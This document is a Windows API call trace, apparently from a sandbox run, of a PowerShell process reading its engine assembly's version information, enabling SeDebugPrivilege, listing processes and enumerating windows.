	[0942.906] GetVersionExW (in: lpVersionInformation=0x10dec0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10dec0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0942.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.917] GetVersionExW (in: lpVersionInformation=0x10dc30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10dc30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0942.918] SetErrorMode (uMode=0x1) returned 0x1
	[0942.919] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10dd90 | out: lpFileInformation=0x10dd90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0942.920] SetErrorMode (uMode=0x1) returned 0x1
	[0942.923] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10e000 | out: lpdwHandle=0x10e000) returned 0x94c
	[0943.346] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d972f0 | out: lpData=0x2d972f0) returned 1
	[0943.348] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10df78, puLen=0x10df70 | out: lplpBuffer=0x10df78*=0x2d9738c, puLen=0x10df70) returned 1
	[0943.351] lstrlenW (lpString="䅁") returned 1
	[0943.360] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x2d97468, puLen=0x10dee0) returned 1
	[0943.361] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0943.363] CoTaskMemAlloc (cb=0x2e) returned 0x3042c0
	[0943.363] lstrcpyW (in: lpString1=0x3042c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0943.364] CoTaskMemFree (pv=0x3042c0) 
	[0943.364] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x2d974bc, puLen=0x10dee0) returned 1
	[0943.364] lstrlenW (lpString="System.Management.Automation") returned 28
	[0943.367] CoTaskMemAlloc (cb=0x3c) returned 0x2c5250
	[0943.367] lstrcpyW (in: lpString1=0x2c5250, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0943.367] CoTaskMemFree (pv=0x2c5250) 
	[0943.367] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x2d97518, puLen=0x10dee0) returned 1
	[0943.367] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0943.367] CoTaskMemAlloc (cb=0x20) returned 0x309940
	[0943.367] lstrcpyW (in: lpString1=0x309940, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0943.367] CoTaskMemFree (pv=0x309940) 
	[0943.367] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x2d97558, puLen=0x10dee0) returned 1
	[0943.367] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0943.367] CoTaskMemAlloc (cb=0x44) returned 0x2c5250
	[0943.368] lstrcpyW (in: lpString1=0x2c5250, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0943.368] CoTaskMemFree (pv=0x2c5250) 
	[0943.368] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x2d975c0, puLen=0x10dee0) returned 1
	[0943.368] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0943.368] CoTaskMemAlloc (cb=0x76) returned 0x2af180
	[0943.368] lstrcpyW (in: lpString1=0x2af180, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0943.368] CoTaskMemFree (pv=0x2af180) 
	[0943.368] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x2d9765c, puLen=0x10dee0) returned 1
	[0943.368] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0943.368] CoTaskMemAlloc (cb=0x44) returned 0x2c5250
	[0943.368] lstrcpyW (in: lpString1=0x2c5250, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0943.368] CoTaskMemFree (pv=0x2c5250) 
	[0943.368] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x2d976c0, puLen=0x10dee0) returned 1
	[0943.368] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0943.368] CoTaskMemAlloc (cb=0x58) returned 0x268a60
	[0943.368] lstrcpyW (in: lpString1=0x268a60, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0943.368] CoTaskMemFree (pv=0x268a60) 
	[0943.368] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x2d9773c, puLen=0x10dee0) returned 1
	[0943.368] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0943.368] CoTaskMemAlloc (cb=0x20) returned 0x309940
	[0943.369] lstrcpyW (in: lpString1=0x309940, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0943.369] CoTaskMemFree (pv=0x309940) 
	[0943.369] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x2d973e4, puLen=0x10dee0) returned 1
	[0943.369] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0943.369] CoTaskMemAlloc (cb=0x66) returned 0x28c2f0
	[0943.369] lstrcpyW (in: lpString1=0x28c2f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0943.369] CoTaskMemFree (pv=0x28c2f0) 
	[0943.369] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x0, puLen=0x10dee0) returned 0
	[0943.369] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x0, puLen=0x10dee0) returned 0
	[0943.369] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10dee8, puLen=0x10dee0 | out: lplpBuffer=0x10dee8*=0x0, puLen=0x10dee0) returned 0
	[0943.369] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10deb8, puLen=0x10deb0 | out: lplpBuffer=0x10deb8*=0x2d9738c, puLen=0x10deb0) returned 1
	[0943.371] CoTaskMemAlloc (cb=0x204) returned 0x2b5db0
	[0943.371] VerLanguageNameW (in: wLang=0x0, szLang=0x2b5db0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0943.372] CoTaskMemFree (pv=0x2b5db0) 
	[0943.373] VerQueryValueW (in: pBlock=0x2d972f0, lpSubBlock="\\", lplpBuffer=0x10df08, puLen=0x10df00 | out: lplpBuffer=0x10df08*=0x2d97318, puLen=0x10df00) returned 1
	[0943.378] GetCurrentProcessId () returned 0x1634
	[0943.955] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x10ce30 | out: lpLuid=0x10ce30*(LowPart=0x14, HighPart=0)) returned 1
	[0943.958] GetCurrentProcess () returned 0xffffffffffffffff
	[0943.959] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x10ce50 | out: TokenHandle=0x10ce50*=0x2d0) returned 1
	[0943.960] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2d9ab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0943.961] CloseHandle (hObject=0x2d0) returned 1
	[0943.964] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1634) returned 0x2d0
	[0943.972] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2d9abd0, cb=0x200, lpcbNeeded=0x10de68 | out: lphModule=0x2d9abd0, lpcbNeeded=0x10de68) returned 1
	[0943.974] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2d9ae40, cb=0x18 | out: lpmodinfo=0x2d9ae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0943.975] CoTaskMemAlloc (cb=0x804) returned 0x30a9e0
	[0943.975] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x30a9e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0943.975] CoTaskMemFree (pv=0x30a9e0) 
	[0943.975] CoTaskMemAlloc (cb=0x804) returned 0x30a9e0
	[0943.975] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x30a9e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0943.976] CoTaskMemFree (pv=0x30a9e0) 
	[0943.976] CloseHandle (hObject=0x2d0) returned 1
	[0943.982] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1634) returned 0x2d0
	[0943.983] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0x10df98 | out: lpExitCode=0x10df98*=0x103) returned 1
	[0944.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d9b088, Length=0x20000, ResultLength=0x10df60 | out: SystemInformation=0x12d9b088, ResultLength=0x10df60*=0x4a050) returned 0xc0000004
	[0944.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dbb0b8, Length=0x4c850, ResultLength=0x10df60 | out: SystemInformation=0x12dbb0b8, ResultLength=0x10df60*=0x4a050) returned 0x0
	[0945.402] EnumWindows (lpEnumFunc=0x22c66ac, lParam=0x0) returned 1
	[0945.404] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.404] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x558
	[0945.404] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.404] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.404] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.404] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x538
	[0945.404] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.405] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x778
	[0945.405] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x778
	[0945.405] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.405] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.405] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.405] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.405] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.405] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.405] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.405] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.405] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x460
	[0945.406] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.406] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.406] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x2440
	[0945.406] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x24d8
	[0945.406] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1aa4
	[0945.406] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1ff0
	[0945.406] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1a84
	[0945.406] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1fb0
	[0945.406] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1e10
	[0945.407] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x23a8
	[0945.407] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1f24
	[0945.407] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x21ec
	[0945.407] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x2320
	[0945.407] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1fd4
	[0945.407] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1880
	[0945.407] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1b18
	[0945.407] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1d6c
	[0945.407] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x233c
	[0945.407] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x2368
	[0945.407] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x2124
	[0945.408] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x22f0
	[0945.408] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x22ac
	[0945.408] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1cdc
	[0945.408] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x10f0
	[0945.408] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1f18
	[0945.408] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x20a8
	[0945.408] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x2004
	[0945.408] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1f88
	[0945.408] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1f84
	[0945.409] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x2050
	[0945.409] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1e04
	[0945.409] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1ecc
	[0945.409] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1e64
	[0945.409] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1b58
	[0945.409] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1e94
	[0945.409] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1e28
	[0945.417] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1df8
	[0945.417] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1da8
	[0945.417] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1c70
	[0945.417] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x163c
	[0945.417] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1a10
	[0945.417] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x186c
	[0945.417] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1d74
	[0945.417] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4c8
	[0945.418] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1960
	[0945.418] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1ce4
	[0945.418] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1b24
	[0945.418] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x14e0
	[0945.418] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x17f0
	[0945.418] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x854
	[0945.418] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1268
	[0945.418] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1624
	[0945.418] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1b9c
	[0945.418] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x16f4
	[0945.419] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x145c
	[0945.419] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x17d0
	[0945.419] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1d28
	[0945.419] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xcb8
	[0945.419] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1190
	[0945.419] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x3a8
	[0945.419] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1bd0
	[0945.419] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1bfc
	[0945.419] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1a78
	[0945.419] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1b90
	[0945.419] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1b04
	[0945.420] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1b34
	[0945.420] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1b64
	[0945.420] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1bb0
	[0945.420] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1acc
	[0945.420] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1a2c
	[0945.420] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x19a8
	[0945.420] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1944
	[0945.420] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x18c8
	[0945.420] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x18ac
	[0945.420] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x18ec
	[0945.421] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1898
	[0945.421] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xc98
	[0945.421] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x153c
	[0945.421] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1808
	[0945.421] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x12a4
	[0945.421] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1740
	[0945.421] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x16c4
